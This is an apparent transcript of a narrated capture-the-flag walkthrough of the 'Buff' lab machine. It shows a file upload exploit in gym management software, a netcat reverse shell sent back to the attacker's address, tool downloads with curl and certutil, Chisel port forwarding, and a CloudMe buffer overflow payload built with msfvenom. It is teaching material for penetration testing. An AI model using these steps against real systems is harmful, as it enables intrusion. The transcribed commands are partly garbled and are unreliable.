Welcome back, here we are. In today's video, we are tackling down a machine that has been retired, which is Buff. So the machine has retired recently, and now we are gonna tackle down the box. Okay, so basically we got the nmap scan. As you can see here, we have a web server running on port 8080. And that's it. So what we're going to do now, it is the only exploitation vector we have. So it is very short. So we will browse to the web server and see what are the ways in. So we launch this. And all the time I forget this. So sudo all right, so we add this to our host file. 10, 10, 10, 189, and the name is buff. Okay. Buff. Is it running on HTTPS? Nope. Oh, the port. Okay. Right. So this is the main page, and it seems like we got many things to test for. That's the initial assessment. Why? Because we have a sign-in form here. We can sign in, but unfortunately, I can't see any register link. So it seems like this member or this web page is a members only, or members can only sign in here, right? Email and password. We can click on, normally when you are faced with a web page like that, we always enumerate and look through all the pages. So if you click on contact, we see here it spells out the version, which is made using gym management software. And as a fitness trainer, I'm curious to know what is that gym management software. If I click on about fitness, right, packages. So these are the packages, facilities, cardio center, strength training, aerobics, nothing interesting. About. So the two things that are interesting are the version here and the sign-in form, right? Since we can't register, and the only way to test to manipulate and play with these forms or the login form is to try SQL injection. We can try also XSS, and we can click on the page source to see if there is any CSRF tokens or a way for CSRF. But that's not the way how you solve the challenge. It is just the methodology. So as you can see, it's running on Aja. No, it is the Google script. So it is running on Bootstrap. Okay. Okay, we close that. Right. So we have to choose between enumerating for possible exploits for the version or running WP-fuzz, WFuzz, or fuzzing for possible injections here. Now, all the time when you test a web application for possible injection in the sign-up forms, login forms, the comments forms, search forms, it is a long way. You need to test too much. It takes too much time. That's why we always, from the perspective of real penetration testing, we all the time look for the shortest path because we are restricted by the time. But the time is your biggest enemy in real world penetration testing, unfortunately, when you have too many projects. That's why we're going to stick with the real penetration testing perspective and enumerate for the possible exploits. So we go back. I'm a bit slow, right? Right. Okay. So sudo search exploit, and we pick up the name gym management software. No results. If we go back, maybe we need to pick something else made using gym. No. MRB. Okay, in this case, we're gonna get the help of Google. Exploit. So we have one exploit database. As you can see, we have SQL injection here. Okay, so unauthenticated, you don't need to sign in, you don't need to have a username. This is great. If this was an authenticated remote code execution, then we're going to drop it immediately. Why? Because we can't have a username here. We don't have an account. There is no opportunity to register. There's only a sign in button. But it's saying unauthenticated, so it means you have an opportunity to rock. So let's take this, download. Okay, open that. My lovely mousepad. Oh, well, this is not bad. Okay, so let's read through this exploit. Exploit title, software link, gym management system version 1.0 suffers from unauthenticated file upload, allowing remote attackers to gain remote code execution on the hosting web server via uploading a maliciously crafted PHP file that bypasses the image upload filters. So it's like you're uploading your own PHP reversal, but instead the exploit is doing the job. Exploit gains access the upload.php page, as it doesn't check for an authenticated user session. Set the ID parameter of the GET request to the desired file name for the uploaded PHP file. Okay. Let's go down, see what else we have. Upload directory. Okay, so here we can see that's how it works. We type Python and the name of the exploit, and then we type the URL, right? And we hit enter. Okay, let's give this a try. Yep, so here we type slash. Right, so this is your first reverse shell. So if you type who am I slash user, we are the user Sean, right? Now, the next step is to do privilege escalation. Pretty easy, right? Just download the exploit, understand how it works, and supply the correct parameters, run it, get your reversal. Oh, okay. Now, actually, there is another way to get your reversal. If you go back to the exploit, this one, right, and we open it with my lovely mousepad, don't make any mistake. Okay. Right. So here, as you can see, there is a way to here exploit the parameter telepathy, right? Let me explain to you what I mean. So if I go back to my browser, And here I supply, as instructed by the exploit, of course, I type upload, try to access. So it is forbidden, but I can see here we have something about the web server. And here, if I go back and typed, yes, this one. So take this and type this here, .php, and the parameter that is vulnerable, actually, it is telepathy, which is the parameter that was used to get the reverse shell. So we take this one and we go back equal. So here we type whatever we want. For example, let me go back to my command line, and here we open new tab. I like the reversals to be alongside each other. That's why I will split the view here, one to the left. Okay, so here nc-lvp45445. Okay, now you guess the next step is to inject netcat here. So here we let the parameter, the variable one, execute commands of our choice. So nc, right, and then we type .exe-cmd, -e first. And here we type our own parameters, which are 10, 10, 14, 16, and 4545. And you hit enter and you wait for your reverse shell that we haven't received. Right. I guess it is my IP all the time. Carry light. Nope, it is right. So here I go back again, nc.exe-ecmd.exe 10, 10, 14, 16, 4545. And nothing. Let me go back here. Set the ID parameter of the GET request to the desired file name for the uploaded PHP file. Okay, move uploaded file, upload users, bypass the extension whitelist. This is the manual way, I guess. All right, here if I type who am I, so it is running, right? So I guess here there is something we need to modify with our own command. Okay, c-e cmd 10, 10, 14, 16, 5. Yet 64.exe-ecmd.exe 10, 10, 16, 5. So maybe it is not working because there is no netcat here, I guess. So directory, as you can see, we need to load netcat in the directory of the upload, right? Upload directory in order to fire up the netcat from this path. But you don't need to do that actually. But it is better if you get a netcat reverse shell. That's why we will first get sys info or system info to know whether we need to put netcat 64 or 86. So Microsoft, let's go down. So we are here x64. So we need to upload x64 netcuts here in the upload directory in order to connect back to our listening version. So we go to Google and like that, we get this and we download this. Go back and here on a separate line or a separate tab, Kali dark light. Okay, no problem. Python /m http.server. Go back and here we download netcut 64. Okay. Now, do we have cert util here? We have it. So cert util -url cache -f 10 10 14 16 8000 nc64 nc64.exe. Huh? Did it work? No? Oh. nc64.exe. Come on, no. Just repeating over and over commands. .exe and then nc64.exe. Warning, unable to execute cert util. Right, so we need to download this another way. Okay, curl http 10 10 14 16 64.exe nc-o. So, right, so it has been pulled, or it is being pulled. Okay, where are you? So here we are, NC64. Now, all we have to do is to go back to our browser and fix this. So NC64, not PC, -e cmd.exe 10 10 14 16 4444. And you get your netcut reversal right here. So this is better, more reliable. Even better if let me use rl wrap. So the rl wrap nc-l lvp 45 or reforce. I don't have it. Right, go back and hit enter, and here you are. So first, who am I/user? You are shown. Who am I/all? Okay, before all of that, system info. See what is the kind of operating system you are interacting with. Go up. So it is Microsoft Windows 10. It is Windows 10. Right, this is the first time I see lab with Windows 10. So this is Windows 10 Enterprise, Microsoft Corporation, and running on VMware x64. Okay, what is your next step? The next step is to download or use, what are these? Close all of that, all of this mess. Okay, we can use Windows X, which is, Suggester, and we can use WinPiece. It is up to you. The last video I used Suggester. This video I'm going to use WinPiece. So here, cd back. Okay, now sudo python http.server. Now we download WinPiece. So curl http 10.14.16 8000, and we come to the dirty thing, the file name winpiece.exe. Oh no, what happened? I forgot to refine the option, and we are into real mess now. Okay, -o winpiece.exe. Oh, okay. So directory, run WinPiece now to save us the time. Okay. So let's explore. Everything in red is the stuff that you will go after or try to go after. So basic sys info, vulnerable. We got many stuff here. CVE 2019-0836, and another vulnerable, T. Too many vulnerabilities, too many. But of course, not all of them will give you privilege escalation, right? So this is elevation to system, by the way. What's that? Let's explore this. Copy link and show me what is that vulnerability. CV 2019, elevation to system via the UPnP device host service and the update orchestrator service. Okay. I am not very well familiar with UPnP. That's why I'm not going to approach this exploit, and you should do that as well. Let's go back. Finished, 9 potential vulnerabilities, username. Okay, go down, show me something else. LDAPs, labs not installed, LSA protection not enabled, which means buffer overflows are open. Prompt for Windows binaries, okay. Permissions authenticated users, we can access up, okay. Right. Built-in account, no. Logged in users. Some auto-log on credentials were found. So we have username and password here, right? But the thing is, we can't log in any way to this machine, right? Via either WinRM or PSXSec, because as far as the machine is concerned, the ports corresponding to these services aren't open. So we might find a way for this later, but we can note this down. Take this, copy, and open your lovely mouse pad. No, not here. New tab, dark, and here sudo or yeah, threads. Okay, continue, carry on. So here we have something else, authenticated. Okay, not interested. Possible DLL hijacking folder. So we can put here malicious DLLs. If we get a malicious server, if we get a misconfigured service, we can change the bin path of this service to point to a DLL we upload to the upload directory. Go down, save me time. What are these? Path injection. Path injection. Okay, I got all of that. Go down further, further, further. Oh, so this is a port that has not shown up in the scan and the machine is listening on 3306, right? And we got many ports the machine is listening on, but they didn't show up, which is due to either firewall rules or we need to do some tunneling to the machine, right? If we want to interact with this port at some point. We go down. So this is finished. Okay, let's go up now, and it's always better to inspect the first section after service information. So this is system information, and where is the service info section? User, process. Okay. So here, let's see what we got. So we have a possible DLL hijacking here in a couple of files. We have NC64, we have HTTPD, and we have CMD and WinPiece, right? I don't know if that's correct. Okay, let's go up to see the vulnerabilities up there. Let me check on this one. Actually, this is the first time I solved the machine. I haven't recorded this before, so you need to bear with me to really find something meaningful to exploit the system. So this is for user access. User access control, not also the system bypass user access control. Just go down. The affected systems are okay, but this might be needs to be done on premises, right, on the machine. Okay. All right. Seems like WinPiece hasn't given me anything, so let's discover ourselves. Let's go back. cd back, cd back, directory. Let's go to users. Let's cd to the user directory. Let's go to desktop. This is the user flag, by the way. Let's go back. Documents, no, downloads. What is that? Cloud me. Type. Oh, I can't type, right? Cloud me 1312. Seems interesting. This file. So let's get the help of Google. See, understand what is this file. Maybe, and the machine name is indicative to a buffer overflow vulnerability, and you have an executable file. So this must be something related, right? Cloud me. Let me copy it. Why I'm typing myself? I don't know. Yeah, buffer overflow. Okay. So cloud me 1.2, 1.1.2, exactly the same, buffer overflow. Let's go down, start the cloud me service and run the script, target, localhost. The dirty stuff, payloads. You see, we need to generate a payload with MSF Venom, replace the payload that you have generated with the one that the developer generated. That's it. Look, 80, 80, 88, 88. So it's going to connect to the target on this port, but the target, according to the nmap scan, has only one open port, which is 88. Let's start dash tnlp. Oh, I thought I'm on Linux. Let's start. I think. Okay, get rid of this. Okay, cd netstat dash antp. Okay, so the machine is 80, 80, 88. So the port is not going to work in this case. The machine is not listening on this port, or it's not finished. Has not finished yet. Okay, let's go back. Let's see if the port is here. Seems like the machine is not listening on this port, right? So how can we change it? Let's go up. Previous. The port isn't showing up for some reason, and the exploit requires to connect to this port, or we're gonna need to change it. But I don't think if we change this, it will work. We need to find a way, actually. I don't know how. Okay, I have an idea. Sometimes not all the results show when you type a command. That's why we will use another method. Next that, let's go up. All right, okay. Dash ATO, and here find str. So nothing in here, right? If I type this way, right? Okay, let me try myself then. Okay, I guess if we establish a tunnel first, let's do a tunnel from our machine, right? To forward every connection on the port 8088 to another ports. I think this way we can connect with this port, or we can at least open it. So for this, we can use many tools for that. Since we don't have SSH running, or we don't have SSH credential, that's how we're going to resort to another tool that does a TCP forwarding. The tool is, if you go to Google, Chisel port forward. This tool does the trick. So we need to launch two connections. One, we need to launch this tool on our machine. It's going to be the server, and on the remote target, which is going to be the client. So this is the syntax. All you have to do is download this tool and run it. Source, Docker, usage, server. Okay. Let's go back and see if we can download only the tool, Chisel. Click here. Okay, let's see if we have it on our box first. I think we have it on Kali. Split. No, we don't have it. Sudo apt-get install. All right, we need to download this manually. So and we download this. Sudo git clone. Okay. cd chisel. cd server. Right. Okay. Now we will navigate where we have downloaded the tool. So we need to first escalate to root. And now we go to OVLS, cd go, cd bin, and chisel. So all I have to do now is to run chisel, right? On our side, we will be the server, right? So in this case, it's going to be chisel, and then we are the server. The port is 88. Why 88? As you can see here, the name indicates that the tunnel will be established over HTTP, and the client or the remote target has HTTP open, right? That's why we're going to use this port to do that. So dash reverse. Okay, so right now we are listening, right? Now the next thing, we need to move this tool to the target. So what we'll do here, we will, let me cut this first. Okay, that's fine. we're gonna move or copy chisel right to home. Okay, now from there we have Python running, so we'll go back to the remote host and download this tool. So let me download this from this shell. So basically curl http chisel.exe, right? Or leave it like that. Dash chisel.exe. Let's go back. Yep. Let's find here. So it is here. All we have to do now is to run it. So chisel, right? Here's the syntax. So first, here we can act as the client. So we type client. Then we type the IP address of our local machine or our Windows or machine, not Windows. So 10, 10, 14, 16, and the port through which the tunnel will be established. It's going to be 88, 80, 80, right? Now we type R for the port forwarding. The port is 8888, and then we type localhost 1. Okay, fine. Next thing is to run chisel now from the server side. Now we have now our client listening, which is here on port 8080, through which the tunnel will be established. We'll go here and run chisel as a client connecting to our server. So basically here chisel read.exe, and then we type client our IP, and then our IP is listening on port 8080, as you can see here. Now -R, the port forwarding section here, 8888, and then localhost, and then 8888. Missing ports. Well, we have typed the port. Oh, I guess the syntax. So here it's not -R. We're gonna type this and like that. Right, so we are connected now. And here we have received the connection. That's great. Now the ports we're gonna now be able to connect to the machine on port 8888, which is the required port for the exploit to work. Okay, let's go back now and go to the exploit, downloads, and the exploit is this one, mousepad. So we're going to take this command and create our own shellcode. So here, sudo. Okay, Dash A x86 is fine. Windows exec is fine. Now here is the CMD that we will change. Okay, so here it will be, we're going to use netcut. So we will go back here. We'll use this path. Okay, this is fine. Because this is the path where the netcut exists, if you remember. So here we're going to remove the calculator. Paste this. Now we will put one single quote. Okay, we're going backslash. And here, yep, so here we need, let me tell you something. So nc-lpp4540. I need to reestablish the session again. So I'm gonna 45 here, 40. Okay, make sure the name are correct. The name is 64. Okay, so here nc64.exe, and then we put the actual command -e cmd exe 10 10 416, and the port we're listening on, which is 4548. 4548. Yep. What happened? Yep, so we forgot the single quote. So here we're going to end this with single quote. Okay. Again, the name. I forgot also to change the variable name. -b payload. Right. Take this, go up all the way till this point. Right. So we changed all of this. Paste. Okay. Save that. And then run. Right now, who am I? User. And you are the administrator. Okay, let's go to cd back directory, cd users directory, cd administrator directory, and here you can reveal the root file. That was it. It wasn't such a difficult challenge. It was somewhat medium between medium and difficult, I would say, but it's definitely not difficult. I mean, we haven't done anything. We just exploited local file, not local file inclusion. We exploited a vulnerability in the gem management system. We were able to grab a reverse shell here, limited access, and then we found that there is a vulnerability, buffer overflow vulnerability, in an application existed by purpose on the machine, right? The machine is not vulnerable, right? It has vulnerabilities, but I wouldn't say that exploiting these vulnerabilities would have given you root access, unless the by purpose application, the cloud me, right? It was existed by purpose to exploit buffer overflow, and there was a root exploit to exploit this buffer overflow. The only remarkable stuff is the port forwarding here. It's not used too much, right? So we use here the Chisel client to connect to port 88, which was not shown in the Nmap scan. So that was it, and I hope you enjoyed that. See you in the next video.